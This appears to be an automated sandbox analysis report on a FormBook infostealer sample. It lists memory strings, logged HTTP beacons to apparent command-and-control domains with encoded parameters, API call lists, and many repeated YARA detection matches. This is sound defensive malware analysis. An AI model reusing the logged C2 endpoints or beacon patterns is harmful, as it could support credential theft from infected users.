68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f

Source: rundll32.exe, 00000005.00000002.825769672.000000000596F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://barmanon5.pro/
Source: Swift.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Swift.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.382009343.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.359345292.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.325127522.0000000008260000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.hallmarktb.com

Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w HTTP/1.1Host: www.hallmarktb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=US/HGfNY9YWYLPWCTBWLA6nVcrxKwQj48xB1ut/cNKd52qSqxSuIfwmOCq9IK55e/8rl&s2MHE=y8UpS6w HTTP/1.1Host: www.kcrsw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=UH1VMjfgpJMWU+/Gn4AwdepKZevv0RxNZvKJDaH/oG1tjT2ASbSXZlDS/qU1YicJYd9A&s2MHE=y8UpS6w HTTP/1.1Host: www.counterpoint.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=t9u9o370/Gy8le3USielS0NDNQF4paptFWM7HrjD+/miGjlRMzz+Q3hrEpue/lFurnLE&s2MHE=y8UpS6w HTTP/1.1Host: www.giaxevn.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=/hsXnIl0hAYrOErJ4UuZDvWeNEd2/L3NRo6zO1KQ/oOCDpqqcfPNzkrpMSnMO3fUk1gw&s2MHE=y8UpS6w HTTP/1.1Host: www.printrynner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=QFC5kflo2W9xiWPHk6PVZq5LNtx9PE4uciQ0+TaWAe5dGm0MZgEm/6IYv+k7jhxT2GZX&s2MHE=y8UpS6w HTTP/1.1Host: www.barmanon5.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&s2MHE=y8UpS6w HTTP/1.1Host: www.fulili.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Swift.exe, 00000000.00000002.311588872.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\Swift.exe

Code function: 0_2_00404FAF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FAF

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: idxgunu.exe PID: 1980, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: idxgunu.exe PID: 4620, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 3216, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: Swift.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
